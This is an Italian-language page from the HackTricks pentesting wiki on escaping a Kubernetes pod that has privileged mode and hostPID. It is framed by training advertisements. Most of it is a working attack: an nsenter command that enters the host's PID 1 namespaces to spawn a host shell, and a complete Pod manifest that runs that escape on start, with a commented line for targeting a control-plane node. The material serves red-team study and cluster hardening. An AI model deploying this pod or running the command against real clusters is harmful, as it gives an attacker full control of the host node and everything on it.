Pod Escape Privileges

Reading time: 2 minutes

tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Privilegi e hostPID

Con questi privilegi avrai accesso ai processi degli host e sufficienti privilegi per entrare nel namespace di uno dei processi dell'host.
Nota che potresti non aver bisogno di privilegi elevati ma solo di alcune capacità e di altri potenziali bypass delle difese (come apparmor e/o seccomp).

Eseguire semplicemente qualcosa come il seguente ti permetterà di fuggire dal pod:

bash
nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Esempio di configurazione:

yaml
apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command:
[
"nsenter",
"--target",
"1",
"--mount",
"--uts",
"--ipc",
"--net",
"--pid",
"--",
"bash",
]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks